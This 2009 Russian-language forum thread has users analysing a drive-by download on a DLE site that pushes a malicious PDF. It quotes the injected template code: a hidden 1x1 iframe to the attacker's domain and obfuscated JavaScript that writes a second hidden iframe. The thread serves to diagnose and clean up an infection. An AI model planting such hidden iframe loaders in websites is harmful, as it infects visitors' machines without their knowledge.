Наверно вирус или троян на сайте [Версия для КПК]

Показать полную графическую версию : Наверно вирус или троян на сайте

AACC

22-09-2009, 14:30

Добрый день!

хотел с вами посоветоваться...

у знакомого есть есть сайт

при заходе на сайте менеджер закачек пытается сразу сам загрузить вот этот файл
http://liveinternetru.net/stat/ethicsIpsum.pdf (осторожно может это вирус)

кто может проверить что это за файл

и что мне посоветовать админу того сайта, где искать этот вредный скрипт который вызывает загрузку файла?
(сайт работает на движке ДЛЕ)

okshef

22-09-2009, 15:46

Результат проверки на Virustotal.com (http://www.virustotal.com/ru/analisis/d46259a15688c36ca57add0764b7f96fad31168552522ec8b5320d08c58e85b6-1253619625) Файл открылся - ничего особенного - эмблема FireFox

CyberDaemon

22-09-2009, 15:58

Файл открылся - ничего особенного »
А Exploit.PDF-JS.Gen не сработал? ;)
Зачем сайт старательно пытается этот PDF втюхать?

okshef

22-09-2009, 16:10

А как он должен был сработать? Единственное, на что обратил внимание - задержка при открытии. Буду благодарен за пояснения, но в Гугл посылать не надо :)

P.S. Отправил на анализ в ESET

akok

22-09-2009, 16:45

AACC, а сайт куда дели?

To change this page, upload your website into the public_html directory

okshef, надеюсь на виртуалке открывал? :)

liveinternetru.net/stat - тут три скрипта загрузчика.

http://www.virustotal.com/ru/analisis/85993823dd96b4d0a380f84afaeee8938d35fa36397748ae59ec3568b683ca25-1253623057

Кстати по одному и тому же IP скачивать не дает больше одного раза.

Все(включая раскладку по сайту) уплывает в еще несколько вирлабов.

AACC

23-09-2009, 00:27

AACC, а сайт куда дели? »
не хотел его рекламировать :)

по одному и тому же IP скачивать не дает больше одного раза.

верно, я тоже это заметил

оказывается код лежал перед </body> в файле main.tpl

<iframe src = "http://liveinternetru.net/stat/index.php" width=1 height=1 style="visibility:hidden">
<textarea id=GhLzcEK style="display:none">%3Ciframe src %3D %22http%3A%2F%2Fliveinternetru.net%2Fstat%2Findex.php%22 width%3D1 height%3D1 style%3D%22visibility%3Ahidden%22%3E</textarea><script>function KHCSXGjE(jEddBy){ fff=op.split("66");alert('FGpjimOxT'); }
var BMKbDt=document;document['wr1ite'.replace(/[0-9]/,'')](unescape(document.getElementById('GhLzcEK').value));function VszbxFSJ(LWznyDzk){ fff.op.replace("v");var fApzn=new Function("QiZ", "return 912451;"); }
</script>

вопрос, как можно такое засунуть? и как нужно от такого предохранять сайт?

akok

23-09-2009, 13:45

AACC, получив пароли от админа или хостера.